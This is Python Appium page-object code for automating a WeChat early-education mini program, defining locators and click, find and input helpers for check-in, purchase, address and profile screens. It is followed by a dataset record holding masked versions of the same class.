again_upload_card_btn_loc = ('xpath', '//*[@text="重新上传截图" and @class="android.widget.Button"]') # 重新上传截图 def click_again_upload_card_btn(self): self.click(self.again_upload_card_btn_loc) save_img_btn_loc = ('xpath', '//*[@text="保存图片" and @class="android.widget.Button"]') # 保存图片 def click_save_img_btn(self): self.click(self.save_img_btn_loc) copy_text_btn_loc = ('xpath', '//*[@text="复制发圈文案" and @class="android.widget.Button"]') # 复制发圈文案 def click_copy_text_btn(self): self.click(self.copy_text_btn_loc) copy_format_btn_loc = ('xpath', '//*[contains(@text, "发布朋友圈截图规范")]') # 发布朋友圈截图规范 def element_copy_format_btn(self): return self.find_element(self.copy_format_btn_loc) card_go_btn_loc = ('xpath', '//*[contains(@text, "关闭小程序,去朋友圈打卡截图")]') # 关闭小程序,去朋友圈打卡截图 def click_card_go_btn(self): self.click(self.card_go_btn_loc) upload_btn_loc = ('xpath', '//*[@text="上传" and @class="android.widget.Button"]') # 上传 def click_upload_btn(self): self.click(self.upload_btn_loc) today_card_btn_loc = ('xpath', '//*[contains(@text, "今日已提交打卡")]') # 今日已提交打卡 def element_today_card_btn(self): return self.find_element(self.today_card_btn_loc) reset_img_btn_loc = ('xpath', '//*[@text="重新选择截图" and @class="android.widget.Button"]') # 重新选择截图 def click_reset_img_btn(self): self.click(self.reset_img_btn_loc) generated_loading_loc = ('xpath', '//*[@resource-id="com.tencent.mm:id/cx" and @text="正在生成..."]') # 正在生成... def element_generated_loading(self): return self.find_element(self.generated_loading_loc) reminder_btn_loc = ('xpath', '//*[contains(@text, "温馨提示")]') # 温馨提示 def element_reminder_btn(self): return self.find_element(self.reminder_btn_loc) page_expired_loc = ('xpath', '//*[contains(@text, "页面已经过期")]') # 页面已经过期 def element_page_expired(self): return self.find_element(self.page_expired_loc) x_btn_loc = ('id', 'com.tencent.mm:id/kx') def click_x_btn(self): self.click(self.x_btn_loc)
normal
{ "blob_id": "1980fb4d6e7d3c6fe51f4a242610b5489e553859", "index": 128, "step-1": "<mask token>\n\n\nclass Zaojiaopage(Crazy):\n <mask token>\n <mask token>\n\n def click_zao(self):\n self.click(self.zao_btn_loc)\n <mask token>\n <mask token>\n\n def click_find(self):\n self.click(self.find_loc)\n <mask token>\n\n def click_title_btn(self):\n self.click(self.title_btn_loc)\n <mask token>\n <mask token>\n\n def click_helper(self):\n self.click(self.helper_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_small_name(self):\n return self.find_element(self.small_name_loc)\n\n def click_small_name(self):\n self.click(self.small_name_loc)\n <mask token>\n\n def click_switching_applet_btn(self):\n self.click(self.switching_applet_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_experience_version_btn(self):\n self.clicks(self.experience_version_btn_loc, -1)\n <mask token>\n\n def element_audition_class_btn(self):\n return self.find_element(self.audition_class_btn_loc)\n\n def click_audition_class_btn(self):\n self.click(self.audition_class_btn_loc)\n <mask token>\n\n def click_wechat_grant_btn(self):\n self.click(self.wechat_grant_btn_loc)\n\n def double_click_wechat_grant(self):\n self.double_click(self.wechat_grant_btn_loc)\n\n def element_wechat_grant_btn(self):\n return self.find_element(self.wechat_grant_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def element_attend_lectures_btn(self):\n return self.find_element(self.attend_lectures_btn_loc)\n <mask token>\n <mask token>\n\n def element_class_btn(self):\n return self.find_element(self.class_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def input_buy_password(self, paw):\n self.send_keys(self.buy_password_loc, paw)\n <mask token>\n <mask token>\n <mask token>\n\n def click_success_btn(self):\n self.click(self.success_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_add_address_btn(self):\n self.click(self.add_address_btn_loc)\n <mask token>\n\n def input_name_btn(self, name):\n self.send_keys(self.name_loc, name)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def input_detailed_address_btn(self, address):\n self.send_keys(self.detailed_address_btn_loc, address)\n <mask token>\n\n def click_save_btn(self):\n self.click(self.save_btn_loc)\n <mask token>\n\n def click_receive_btn(self):\n self.click(self.receive_btn_loc)\n <mask token>\n <mask token>\n\n def clicks_addressee(self):\n self.clicks(self.addressee_loc, 0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def element_all_curriculum_btn(self):\n return self.find_element(self.all_curriculum_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def text_my_baby_title(self):\n return self.get_text(self.my_baby_title_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_new_baby_btn(self, n):\n self.clicks(self.new_baby_btn_loc, n)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_baby_bir_btn(self):\n self.click(self.baby_bir_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_my_home(self):\n self.click(self.my_home_loc)\n\n def element_my_home(self):\n return self.find_element(self.my_home_loc)\n <mask token>\n\n def click_switch_btn(self):\n self.click(self.switch_btn_loc)\n <mask token>\n\n def click_baby_bri(self):\n self.click(self.baby_bri_loc)\n <mask token>\n\n def clicks_class_img(self):\n self.clicks(self.class_img_btn_loc, 0)\n <mask token>\n\n def click_collection_btn(self):\n self.click(self.collection_btn_loc)\n\n def clicks_collection_btn(self, n):\n self.clicks(self.collection_btn_loc, n)\n <mask token>\n <mask token>\n\n def click_write_record_btn(self):\n self.click(self.write_record_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_album_btn(self):\n return self.find_element(self.album_btn_loc)\n <mask token>\n <mask token>\n\n def element_small_video_btn(self):\n return self.find_element(self.small_video_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_record_info(self, data):\n record_info_loc = 'xpath', '//*[contains(@text, \"{}\")]'.format(data)\n record_info = self.find_element(record_info_loc)\n if record_info:\n return True\n else:\n return False\n <mask token>\n <mask token>\n <mask token>\n\n def elements_class_name(self):\n return self.find_elements(self.class_name_loc)\n <mask token>\n\n def click_class2_name(self):\n self.click(self.class_name2_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def elements_choice_album(self):\n return self.find_elements(self.choice_album_loc)\n <mask token>\n\n def click_complete_btn(self):\n self.click(self.complete_btn_loc)\n <mask token>\n\n def click_my_collection_btn(self):\n self.click(self.my_collection_btn_loc)\n <mask token>\n\n def elements_my_collection_english_course_btn(self):\n return self.find_elements(self.my_collection_english_course_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_my_course_btn(self):\n self.click(self.my_course_btn_loc)\n <mask token>\n\n def elements_my_course_buy_btn(self):\n return self.find_elements(self.my_course_buy_btn_loc)\n <mask token>\n\n def click_my_order_btn(self):\n self.click(self.my_order_btn_loc)\n <mask token>\n\n def elements_my_order_card_btn(self):\n return self.find_elements(self.my_order_card_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def elements_my_record_class_btn(self):\n return self.find_elements(self.my_record_class_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_reply_code(self, n):\n self.clicks(self.reply_code_loc, n)\n <mask token>\n\n def element_long_code(self):\n return self.find_element(self.long_code_loc)\n\n def click_long_code(self):\n self.click(self.long_code_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def text_class_group(self):\n return self.get_text(self.class_group_loc)\n <mask token>\n\n def element_add_group_chat(self):\n return self.find_element(self.add_group_chat_loc)\n <mask token>\n\n def elements_reply_8(self):\n return self.find_elements(self.reply_8_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_more_games_btn(self):\n self.click(self.more_games_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def text_start_fingerprint_buy(self):\n return self.get_text(self.start_fingerprint_buy_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_cancel_btn(self):\n self.click(self.cancel_btn_loc)\n <mask token>\n\n def element_usd_password(self):\n return self.find_element(self.usd_password_loc)\n <mask token>\n <mask token>\n\n def element_password_error(self):\n return self.find_element(self.password_error_loc)\n <mask token>\n\n def click_again_btn(self):\n self.click(self.again_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_typewriting_finish_btn(self):\n return self.find_element(self.typewriting_finish_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_clock_btn(self):\n return self.find_element(self.clock_btn_loc)\n <mask token>\n\n def element_no_clock_btn(self):\n return self.find_element(self.no_clock_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_upload_card_btn(self):\n self.click(self.upload_card_btn_loc)\n <mask token>\n\n def click_again_upload_card_btn(self):\n self.click(self.again_upload_card_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def element_copy_format_btn(self):\n return self.find_element(self.copy_format_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_upload_btn(self):\n self.click(self.upload_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_reset_img_btn(self):\n self.click(self.reset_img_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_reminder_btn(self):\n return self.find_element(self.reminder_btn_loc)\n <mask token>\n\n def element_page_expired(self):\n return self.find_element(self.page_expired_loc)\n <mask token>\n\n def click_x_btn(self):\n self.click(self.x_btn_loc)\n", "step-2": "<mask token>\n\n\nclass Zaojiaopage(Crazy):\n <mask token>\n <mask token>\n\n def click_zao(self):\n self.click(self.zao_btn_loc)\n <mask token>\n <mask token>\n\n def click_find(self):\n self.click(self.find_loc)\n <mask token>\n\n def click_title_btn(self):\n self.click(self.title_btn_loc)\n <mask token>\n <mask token>\n\n def click_helper(self):\n self.click(self.helper_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_small_name(self):\n return self.find_element(self.small_name_loc)\n\n def click_small_name(self):\n self.click(self.small_name_loc)\n <mask token>\n\n def click_switching_applet_btn(self):\n self.click(self.switching_applet_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_experience_version_btn(self):\n self.clicks(self.experience_version_btn_loc, -1)\n <mask token>\n\n def element_audition_class_btn(self):\n return self.find_element(self.audition_class_btn_loc)\n\n def click_audition_class_btn(self):\n self.click(self.audition_class_btn_loc)\n <mask token>\n\n def click_wechat_grant_btn(self):\n self.click(self.wechat_grant_btn_loc)\n\n def double_click_wechat_grant(self):\n self.double_click(self.wechat_grant_btn_loc)\n\n def element_wechat_grant_btn(self):\n return self.find_element(self.wechat_grant_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_mouth_btn(self):\n self.click(self.month_btn_loc)\n <mask token>\n\n def click_sure_btn(self):\n self.click(self.sure_btn_loc)\n <mask token>\n\n def class_info_btn(self):\n self.click(self.class_info_loc)\n <mask token>\n\n def element_attend_lectures_btn(self):\n return self.find_element(self.attend_lectures_btn_loc)\n <mask token>\n <mask token>\n\n def element_class_btn(self):\n return self.find_element(self.class_btn_loc)\n <mask token>\n <mask token>\n\n def element_get_to_know_btn(self):\n return self.find_element(self.get_to_know_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def input_buy_password(self, paw):\n self.send_keys(self.buy_password_loc, paw)\n <mask token>\n <mask token>\n <mask token>\n\n def click_success_btn(self):\n self.click(self.success_btn_loc)\n <mask token>\n\n def click_check_address_btn(self):\n self.click(self.check_address_btn_loc)\n <mask token>\n <mask token>\n\n def click_add_address_btn(self):\n self.click(self.add_address_btn_loc)\n <mask token>\n\n def input_name_btn(self, name):\n self.send_keys(self.name_loc, name)\n <mask token>\n\n def input_phone_btn(self, phone):\n self.send_keys(self.phone_btn_loc, phone)\n <mask token>\n <mask token>\n <mask token>\n\n def input_detailed_address_btn(self, address):\n self.send_keys(self.detailed_address_btn_loc, address)\n <mask token>\n\n def click_save_btn(self):\n self.click(self.save_btn_loc)\n <mask token>\n\n def click_receive_btn(self):\n self.click(self.receive_btn_loc)\n <mask token>\n <mask token>\n\n def clicks_addressee(self):\n self.clicks(self.addressee_loc, 0)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def element_all_curriculum_btn(self):\n return self.find_element(self.all_curriculum_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def element_my_btn(self):\n return self.find_element(self.my_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def text_my_baby_title(self):\n return self.get_text(self.my_baby_title_loc)\n <mask token>\n <mask token>\n\n def element_new_baby_btn(self):\n return self.find_element(self.new_baby_btn_loc)\n <mask token>\n\n def clicks_new_baby_btn(self, n):\n self.clicks(self.new_baby_btn_loc, n)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_baby_bir_btn(self):\n self.click(self.baby_bir_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_my_home(self):\n self.click(self.my_home_loc)\n\n def element_my_home(self):\n return self.find_element(self.my_home_loc)\n <mask token>\n\n def click_switch_btn(self):\n self.click(self.switch_btn_loc)\n <mask token>\n\n def click_baby_bri(self):\n self.click(self.baby_bri_loc)\n <mask token>\n\n def clicks_class_img(self):\n self.clicks(self.class_img_btn_loc, 0)\n <mask token>\n\n def click_collection_btn(self):\n self.click(self.collection_btn_loc)\n\n def clicks_collection_btn(self, n):\n self.clicks(self.collection_btn_loc, n)\n <mask token>\n <mask token>\n\n def click_write_record_btn(self):\n self.click(self.write_record_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_album_btn(self):\n return self.find_element(self.album_btn_loc)\n <mask token>\n <mask token>\n\n def element_small_video_btn(self):\n return self.find_element(self.small_video_btn_loc)\n <mask token>\n <mask token>\n\n def clicks_release_btn(self, n):\n self.clicks(self.release_btn_loc, n)\n\n def element_record_info(self, data):\n record_info_loc = 'xpath', '//*[contains(@text, \"{}\")]'.format(data)\n record_info = self.find_element(record_info_loc)\n if record_info:\n return True\n else:\n return False\n <mask token>\n <mask token>\n <mask token>\n\n def elements_class_name(self):\n return self.find_elements(self.class_name_loc)\n <mask token>\n\n def click_class2_name(self):\n self.click(self.class_name2_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_choice_album(self, n):\n self.clicks(self.choice_album_loc, n)\n\n def elements_choice_album(self):\n return self.find_elements(self.choice_album_loc)\n <mask token>\n\n def click_complete_btn(self):\n self.click(self.complete_btn_loc)\n <mask token>\n\n def click_my_collection_btn(self):\n self.click(self.my_collection_btn_loc)\n <mask token>\n\n def elements_my_collection_english_course_btn(self):\n return self.find_elements(self.my_collection_english_course_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_my_course_btn(self):\n self.click(self.my_course_btn_loc)\n <mask token>\n\n def elements_my_course_buy_btn(self):\n return self.find_elements(self.my_course_buy_btn_loc)\n <mask token>\n\n def click_my_order_btn(self):\n self.click(self.my_order_btn_loc)\n <mask token>\n\n def elements_my_order_card_btn(self):\n return self.find_elements(self.my_order_card_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def elements_my_record_class_btn(self):\n return self.find_elements(self.my_record_class_btn_loc)\n <mask token>\n <mask token>\n\n def click_back_btn(self):\n self.click(self.back_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_send(self):\n self.click(self.send_5_loc)\n <mask token>\n <mask token>\n\n def clicks_reply_code(self, n):\n self.clicks(self.reply_code_loc, n)\n <mask token>\n\n def element_long_code(self):\n return self.find_element(self.long_code_loc)\n\n def click_long_code(self):\n self.click(self.long_code_loc)\n <mask token>\n\n def click_discern_code(self):\n self.click(self.discern_code_loc)\n <mask token>\n\n def text_class_group(self):\n return self.get_text(self.class_group_loc)\n <mask token>\n\n def element_add_group_chat(self):\n return self.find_element(self.add_group_chat_loc)\n <mask token>\n\n def elements_reply_8(self):\n return self.find_elements(self.reply_8_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_more_games_btn(self):\n self.click(self.more_games_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def text_start_fingerprint_buy(self):\n return self.get_text(self.start_fingerprint_buy_loc)\n <mask token>\n\n def click_no_more_reminder_btn(self):\n self.click(self.no_more_reminder_btn_loc)\n <mask token>\n\n def click_cancel_btn(self):\n self.click(self.cancel_btn_loc)\n <mask token>\n\n def element_usd_password(self):\n return self.find_element(self.usd_password_loc)\n <mask token>\n <mask token>\n\n def element_password_error(self):\n return self.find_element(self.password_error_loc)\n <mask token>\n\n def click_again_btn(self):\n self.click(self.again_btn_loc)\n <mask token>\n\n def text_payment(self):\n return self.get_text(self.payment_loc)\n <mask token>\n\n def element_typewriting_finish_btn(self):\n return self.find_element(self.typewriting_finish_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_clock_btn(self):\n return self.find_element(self.clock_btn_loc)\n <mask token>\n\n def element_no_clock_btn(self):\n return self.find_element(self.no_clock_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_upload_card_btn(self):\n self.click(self.upload_card_btn_loc)\n <mask token>\n\n def click_again_upload_card_btn(self):\n self.click(self.again_upload_card_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_copy_text_btn(self):\n self.click(self.copy_text_btn_loc)\n <mask token>\n\n def element_copy_format_btn(self):\n return self.find_element(self.copy_format_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_upload_btn(self):\n self.click(self.upload_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_reset_img_btn(self):\n self.click(self.reset_img_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_reminder_btn(self):\n return self.find_element(self.reminder_btn_loc)\n <mask token>\n\n def element_page_expired(self):\n return self.find_element(self.page_expired_loc)\n <mask token>\n\n def click_x_btn(self):\n self.click(self.x_btn_loc)\n", "step-3": "<mask token>\n\n\nclass Zaojiaopage(Crazy):\n <mask token>\n <mask token>\n\n def click_zao(self):\n self.click(self.zao_btn_loc)\n\n def element_zao(self):\n return self.find_element(self.zao_btn_loc)\n <mask token>\n\n def click_find(self):\n self.click(self.find_loc)\n <mask token>\n\n def click_title_btn(self):\n self.click(self.title_btn_loc)\n <mask token>\n <mask token>\n\n def click_helper(self):\n self.click(self.helper_loc)\n <mask token>\n\n def click_small_help_btn(self):\n self.click(self.small_help_btn_loc)\n <mask token>\n\n def element_small_name(self):\n return self.find_element(self.small_name_loc)\n\n def click_small_name(self):\n self.click(self.small_name_loc)\n <mask token>\n\n def click_switching_applet_btn(self):\n self.click(self.switching_applet_btn_loc)\n <mask token>\n\n def click_delete_small_btn(self):\n self.click(self.delete_small_btn_loc)\n <mask token>\n\n def element_edition_btn(self):\n return self.find_element(self.edition_btn_loc)\n <mask token>\n\n def element_delete_small1_btn(self):\n return self.find_element(self.delete_small1_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def clicks_experience_version_btn(self):\n self.clicks(self.experience_version_btn_loc, -1)\n <mask token>\n\n def element_audition_class_btn(self):\n return self.find_element(self.audition_class_btn_loc)\n\n def click_audition_class_btn(self):\n self.click(self.audition_class_btn_loc)\n <mask token>\n\n def click_wechat_grant_btn(self):\n self.click(self.wechat_grant_btn_loc)\n\n def double_click_wechat_grant(self):\n self.double_click(self.wechat_grant_btn_loc)\n\n def element_wechat_grant_btn(self):\n return self.find_element(self.wechat_grant_btn_loc)\n <mask token>\n\n def click_allow_btn(self):\n self.click(self.allow_btn_loc)\n <mask token>\n\n def click_mouth_btn(self):\n self.click(self.month_btn_loc)\n <mask token>\n\n def click_sure_btn(self):\n self.click(self.sure_btn_loc)\n <mask token>\n\n def class_info_btn(self):\n self.click(self.class_info_loc)\n <mask token>\n\n def element_attend_lectures_btn(self):\n return self.find_element(self.attend_lectures_btn_loc)\n <mask token>\n <mask token>\n\n def element_class_btn(self):\n return self.find_element(self.class_btn_loc)\n <mask token>\n\n def click_get_to_know_btn(self):\n self.click(self.get_to_know_btn_loc)\n\n def element_get_to_know_btn(self):\n return self.find_element(self.get_to_know_btn_loc)\n <mask token>\n\n def click_sure_buy_btn(self):\n self.click(self.sure_buy_btn_loc)\n <mask token>\n\n def input_buy_password(self, paw):\n self.send_keys(self.buy_password_loc, paw)\n <mask token>\n\n def text_buy_money(self):\n return self.get_text(self.check_buy_money_loc)\n <mask token>\n\n def click_success_btn(self):\n self.click(self.success_btn_loc)\n <mask token>\n\n def click_check_address_btn(self):\n self.click(self.check_address_btn_loc)\n <mask token>\n <mask token>\n\n def click_add_address_btn(self):\n self.click(self.add_address_btn_loc)\n <mask token>\n\n def input_name_btn(self, name):\n self.send_keys(self.name_loc, name)\n <mask token>\n\n def input_phone_btn(self, phone):\n self.send_keys(self.phone_btn_loc, phone)\n <mask token>\n <mask token>\n <mask token>\n\n def input_detailed_address_btn(self, address):\n self.send_keys(self.detailed_address_btn_loc, address)\n <mask token>\n\n def click_save_btn(self):\n self.click(self.save_btn_loc)\n <mask token>\n\n def click_receive_btn(self):\n self.click(self.receive_btn_loc)\n <mask token>\n\n def elements_addressee(self):\n return self.find_elements(self.addressee_loc)\n\n def clicks_addressee(self):\n self.clicks(self.addressee_loc, 0)\n <mask token>\n <mask token>\n\n def click_know(self):\n self.click(self.know_btn_loc)\n <mask token>\n\n def element_all_curriculum_btn(self):\n return self.find_element(self.all_curriculum_btn_loc)\n\n def click_all_curriculum_btn(self):\n self.click(self.all_curriculum_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_my_btn(self):\n return self.find_element(self.my_btn_loc)\n <mask token>\n <mask token>\n\n def click_my_baby(self):\n self.click(self.my_baby_btn_loc)\n <mask token>\n\n def text_my_baby_title(self):\n return self.get_text(self.my_baby_title_loc)\n <mask token>\n <mask token>\n\n def element_new_baby_btn(self):\n return self.find_element(self.new_baby_btn_loc)\n\n def click_new_baby_btn(self):\n self.click(self.new_baby_btn_loc)\n\n def clicks_new_baby_btn(self, n):\n self.clicks(self.new_baby_btn_loc, n)\n <mask token>\n\n def element_get_set(self):\n return self.find_element(self.get_set_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def inputs_baby_name(self, name, n):\n self.sends_keys(self.baby_name_loc, name, n)\n <mask token>\n\n def click_baby_bir_btn(self):\n self.click(self.baby_bir_btn_loc)\n <mask token>\n\n def click_finish_btn(self):\n self.click(self.finish_btn_loc)\n <mask token>\n <mask token>\n\n def click_my_home(self):\n self.click(self.my_home_loc)\n\n def element_my_home(self):\n return self.find_element(self.my_home_loc)\n <mask token>\n\n def click_switch_btn(self):\n self.click(self.switch_btn_loc)\n <mask token>\n\n def click_baby_bri(self):\n self.click(self.baby_bri_loc)\n <mask token>\n\n def clicks_class_img(self):\n self.clicks(self.class_img_btn_loc, 0)\n <mask token>\n\n def click_collection_btn(self):\n self.click(self.collection_btn_loc)\n\n def clicks_collection_btn(self, n):\n self.clicks(self.collection_btn_loc, n)\n <mask token>\n <mask token>\n\n def click_write_record_btn(self):\n self.click(self.write_record_btn_loc)\n\n def clicks_write_record_btn(self, n):\n self.clicks(self.write_record_btn_loc, n)\n <mask token>\n\n def click_album_btn(self):\n self.click(self.album_btn_loc)\n\n def element_album_btn(self):\n return self.find_element(self.album_btn_loc)\n <mask token>\n\n def click_small_video_btn(self):\n self.click(self.small_video_btn_loc)\n\n def element_small_video_btn(self):\n return self.find_element(self.small_video_btn_loc)\n <mask token>\n <mask token>\n\n def clicks_release_btn(self, n):\n self.clicks(self.release_btn_loc, n)\n\n def element_record_info(self, data):\n record_info_loc = 'xpath', '//*[contains(@text, \"{}\")]'.format(data)\n record_info = self.find_element(record_info_loc)\n if record_info:\n return True\n else:\n return False\n <mask token>\n <mask token>\n <mask token>\n\n def elements_class_name(self):\n return self.find_elements(self.class_name_loc)\n <mask token>\n\n def click_class2_name(self):\n self.click(self.class_name2_loc)\n <mask token>\n <mask token>\n\n def input_write_text(self, text):\n self.send_keys(self.write_text_loc, text)\n <mask token>\n <mask token>\n\n def clicks_choice_album(self, n):\n self.clicks(self.choice_album_loc, n)\n\n def elements_choice_album(self):\n return self.find_elements(self.choice_album_loc)\n <mask token>\n\n def click_complete_btn(self):\n self.click(self.complete_btn_loc)\n <mask token>\n\n def click_my_collection_btn(self):\n self.click(self.my_collection_btn_loc)\n <mask token>\n\n def elements_my_collection_english_course_btn(self):\n return self.find_elements(self.my_collection_english_course_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_my_course_btn(self):\n self.click(self.my_course_btn_loc)\n <mask token>\n\n def elements_my_course_buy_btn(self):\n return self.find_elements(self.my_course_buy_btn_loc)\n <mask token>\n\n def click_my_order_btn(self):\n self.click(self.my_order_btn_loc)\n <mask token>\n\n def elements_my_order_card_btn(self):\n return self.find_elements(self.my_order_card_btn_loc)\n <mask token>\n\n def click_my_record_btn(self):\n self.click(self.my_record_btn_loc)\n <mask token>\n\n def elements_my_record_class_btn(self):\n return self.find_elements(self.my_record_class_btn_loc)\n <mask token>\n\n def element_back_btn(self):\n return self.find_element(self.back_btn_loc)\n\n def click_back_btn(self):\n self.click(self.back_btn_loc)\n <mask token>\n\n def click_reply_5(self):\n self.click(self.reply_5_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def input_reply_5(self, num):\n self.send_keys(self.reply_input_5_loc, num)\n <mask token>\n\n def click_send(self):\n self.click(self.send_5_loc)\n <mask token>\n <mask token>\n\n def clicks_reply_code(self, n):\n self.clicks(self.reply_code_loc, n)\n <mask token>\n\n def element_long_code(self):\n return self.find_element(self.long_code_loc)\n\n def click_long_code(self):\n self.click(self.long_code_loc)\n <mask token>\n\n def click_discern_code(self):\n self.click(self.discern_code_loc)\n <mask token>\n\n def text_class_group(self):\n return self.get_text(self.class_group_loc)\n <mask token>\n\n def element_add_group_chat(self):\n return self.find_element(self.add_group_chat_loc)\n <mask token>\n\n def elements_reply_8(self):\n return self.find_elements(self.reply_8_loc)\n <mask token>\n\n def element_parent_btn(self):\n return self.find_element(self.parent_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n <mask token>\n\n def click_more_games_btn(self):\n self.click(self.more_games_btn_loc)\n <mask token>\n\n def click_look_all_btn(self):\n self.click(self.look_all_btn_loc)\n\n def element_look_all_btn(self):\n return self.find_elements(self.look_all_btn_loc)\n <mask token>\n\n def text_start_fingerprint_buy(self):\n return self.get_text(self.start_fingerprint_buy_loc)\n <mask token>\n\n def click_no_more_reminder_btn(self):\n self.click(self.no_more_reminder_btn_loc)\n <mask token>\n\n def click_cancel_btn(self):\n self.click(self.cancel_btn_loc)\n <mask token>\n\n def element_usd_password(self):\n return self.find_element(self.usd_password_loc)\n <mask token>\n <mask token>\n\n def element_password_error(self):\n return self.find_element(self.password_error_loc)\n <mask token>\n\n def click_again_btn(self):\n self.click(self.again_btn_loc)\n <mask token>\n\n def text_payment(self):\n return self.get_text(self.payment_loc)\n <mask token>\n\n def element_typewriting_finish_btn(self):\n return self.find_element(self.typewriting_finish_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def element_clock_btn(self):\n return self.find_element(self.clock_btn_loc)\n <mask token>\n\n def element_no_clock_btn(self):\n return self.find_element(self.no_clock_btn_loc)\n <mask token>\n <mask token>\n <mask token>\n\n def click_upload_card_btn(self):\n self.click(self.upload_card_btn_loc)\n <mask token>\n\n def click_again_upload_card_btn(self):\n self.click(self.again_upload_card_btn_loc)\n <mask token>\n\n def click_save_img_btn(self):\n self.click(self.save_img_btn_loc)\n <mask token>\n\n def click_copy_text_btn(self):\n self.click(self.copy_text_btn_loc)\n <mask token>\n\n def element_copy_format_btn(self):\n return self.find_element(self.copy_format_btn_loc)\n <mask token>\n\n def click_card_go_btn(self):\n self.click(self.card_go_btn_loc)\n <mask token>\n\n def click_upload_btn(self):\n self.click(self.upload_btn_loc)\n <mask token>\n\n def element_today_card_btn(self):\n return self.find_element(self.today_card_btn_loc)\n <mask token>\n\n def click_reset_img_btn(self):\n self.click(self.reset_img_btn_loc)\n <mask token>\n\n def element_generated_loading(self):\n return self.find_element(self.generated_loading_loc)\n <mask token>\n\n def element_reminder_btn(self):\n return self.find_element(self.reminder_btn_loc)\n <mask token>\n\n def element_page_expired(self):\n return self.find_element(self.page_expired_loc)\n <mask token>\n\n def click_x_btn(self):\n self.click(self.x_btn_loc)\n", "step-4": "<mask token>\n\n\nclass Zaojiaopage(Crazy):\n <mask token>\n <mask token>\n\n def click_zao(self):\n self.click(self.zao_btn_loc)\n\n def element_zao(self):\n return self.find_element(self.zao_btn_loc)\n <mask token>\n\n def click_find(self):\n self.click(self.find_loc)\n <mask token>\n\n def click_title_btn(self):\n self.click(self.title_btn_loc)\n <mask token>\n\n def element_helper(self):\n return self.find_element(self.helper_loc)\n\n def click_helper(self):\n self.click(self.helper_loc)\n <mask token>\n\n def click_small_help_btn(self):\n self.click(self.small_help_btn_loc)\n <mask token>\n\n def element_small_name(self):\n return self.find_element(self.small_name_loc)\n\n def click_small_name(self):\n self.click(self.small_name_loc)\n <mask token>\n\n def click_switching_applet_btn(self):\n self.click(self.switching_applet_btn_loc)\n <mask token>\n\n def 